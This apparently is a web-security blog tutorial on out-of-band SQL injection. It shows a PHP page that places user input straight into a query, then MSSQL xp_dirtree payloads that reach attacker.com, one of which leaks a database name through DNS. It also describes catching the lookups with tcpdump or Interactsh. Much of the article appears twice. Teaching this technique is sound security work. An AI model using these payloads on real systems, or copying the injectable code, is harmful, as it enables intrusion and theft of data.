Thilan Dissanayaka Web App Hacking Apr 26

Out of Band SQL Injection

Normally in SQL Injection, the attacker:

Sees direct errors, or

Infers information through page behavior or timing.

But Out-of-Band SQL Injection is different:

OOB SQLi relies on making the vulnerable database initiate a network connection (like HTTP or DNS) to an attacker-controlled server to leak data.

This is useful when:

Errors are hidden,

No differences in page behavior,

No timing differences.

Example:

The vulnerable server sends a DNS or HTTP request to attacker.com containing database data.

How Out-of-Band SQL Injection Works Some databases have functions that allow making external network connections:

Database Functions MySQL LOAD_FILE(), INTO OUTFILE, xp_dirtree() (when MySQL linked to MSSQL) Microsoft SQL Server xp_dirtree(), xp_fileexist() Oracle UTL_HTTP.REQUEST, UTL_INADDR.GET_HOST_ADDRESS An attacker can exploit these features to:

Force a DNS lookup

Trigger an HTTP request

Leak data through those requests.

Real-World Example Setup Imagine a PHP page like:

<?php
$id = $_GET['id'];
$query = "SELECT name, price FROM products WHERE id = '$id'";
$result = mysqli_query($conn, $query);
if (mysqli_num_rows($result) > 0) {
    $row = mysqli_fetch_assoc($result);
    echo "Product Name: " . $row['name'];
}
?>

Problems:

User input is directly injected into SQL

No output-based or time-based feedback

Example OOB SQL Injection Exploit Assume the database is MSSQL Server and has access to the internet. We can use the function xp_dirtree() to trigger a network request.

Injection payload:

What is Out-of-Band (OOB) SQL Injection? Normally in SQL Injection, the attacker:

Sees direct errors, or

Infers information through page behavior or timing.

But Out-of-Band SQL Injection is different:

OOB SQLi relies on making the vulnerable database initiate a network connection (like HTTP or DNS) to an attacker-controlled server to leak data.

This is useful when:

Errors are hidden,

No differences in page behavior,

No timing differences.

Example:

The vulnerable server sends a DNS or HTTP request to attacker.com containing database data.

How Out-of-Band SQL Injection Works Some databases have functions that allow making external network connections:

Database Functions MySQL LOAD_FILE(), INTO OUTFILE, xp_dirtree() (when MySQL linked to MSSQL) Microsoft SQL Server xp_dirtree(), xp_fileexist() Oracle UTL_HTTP.REQUEST, UTL_INADDR.GET_HOST_ADDRESS An attacker can exploit these features to:

Force a DNS lookup

Trigger an HTTP request

Leak data through those requests.

Real-World Example Setup Imagine a PHP page like:

<?php
$id = $_GET['id'];
$query = "SELECT name, price FROM products WHERE id = '$id'";
$result = mysqli_query($conn, $query);
if (mysqli_num_rows($result) > 0) {
    $row = mysqli_fetch_assoc($result);
    echo "Product Name: " . $row['name'];
}
?>

User input is directly injected into SQL

No output-based or time-based feedback

Example OOB SQL Injection Exploit Assume the database is MSSQL Server and has access to the internet. We can use the function xp_dirtree() to trigger a network request.

Injection payload:

'; EXEC master..xp_dirtree '\\attacker.com\test' --

Full URL:

http://victim.com/product.php?id='; EXEC master..xp_dirtree '\\attacker.com\test'--

What happens?

The database server tries to list the contents of the share \attacker.com\test

A DNS lookup happens for attacker.com

The attacker sees the request and knows the SQL injection worked!

Another Example: Leaking Data You can even exfiltrate data!

Example payload:

'; EXEC master..xp_dirtree '\\' + (SELECT TOP 1 name FROM master..sysdatabases) + '.attacker.com\abc' --

If the first database name is 'testdb', the database server will try to access:

testdb.attacker.com

If you monitor your domain’s DNS logs, you can see the database name!

Setting Up the Attacker's Server You need to set up:

A DNS listener (example: using tcpdump, dnsmasq, Burp Collaborator, or Interactsh)

Or a web server to catch HTTP requests.

Simple using tcpdump to catch DNS:

sudo tcpdump -i eth0 port 53

Or use public services like:

Interactsh (by Project Discovery)

Burp Collaborator client

They give you a domain like random.oastify.com, and log incoming requests.

'; EXEC master..xp_dirtree '\\attacker.com\test' --

Full URL:

http://victim.com/product.php?id='; EXEC master..xp_dirtree '\\attacker.com\test'--

What happens?

The database server tries to list the contents of the share \attacker.com\test

A DNS lookup happens for attacker.com

The attacker sees the request and knows the SQL injection worked!

Another Example: Leaking Data You can even exfiltrate data!

Example payload:

'; EXEC master..xp_dirtree '\\' + (SELECT TOP 1 name FROM master..sysdatabases) + '.attacker.com\abc' --

If the first database name is 'testdb', the database server will try to access:

testdb.attacker.com

If you monitor your domain’s DNS logs, you can see the database name!

Setting Up the Attacker's Server You need to set up:

A DNS listener (example: using tcpdump, dnsmasq, Burp Collaborator, or Interactsh)

Or a web server to catch HTTP requests.

Simple using tcpdump to catch DNS:

sudo tcpdump -i eth0 port 53

Or use public services like:

Interactsh (by Project Discovery)

Burp Collaborator client

They give you a domain like random.oastify.com, and log incoming requests.

ALSO READ
Error based SQL Injection
Apr 26 Web App Hacking

In the previous example, we saw how a classic [SQL Injection Login Bypass](https://hacksland.net/sql-injection-login-bypass) works. SQL Injection is not all about that. The real fun is we can extract....

GDB reverse engineering tutorial
Mar 23 Low-level Development

hiii, I selected an interesting topic to discuss. Here, we are going to disassemble a binary file and take a look at what it does. This process is called reverse engineering. Let's run the program....

Remote Command Execution
Mar 23 Web App Hacking

Remote Command Execution (RCE) is a critical security vulnerability that allows an attacker to execute arbitrary commands on a remote server. This vulnerability can lead to unauthorized access, data....

Adapter Pattern explained simply
Apr 26 Software Architecture

Ever needed to connect two incompatible interfaces without changing their source code? That’s exactly where the **Adapter Pattern** shines! The Adapter Pattern is a structural design pattern....

Database Indexing: Speeding Up Your Queries Like a Pro
Apr 26 Database Systems

In the world of databases, speed matters. Whether you're powering an e-commerce store, a social media app, or a business dashboard — users expect data to load instantly. That’s where database....

Template Pattern explained simply
Apr 26 Software Architecture

Ever found yourself writing similar logic over and over, only to change a few steps each time? That’s exactly what the **Template Pattern** helps you solve. The **Template Pattern** is a....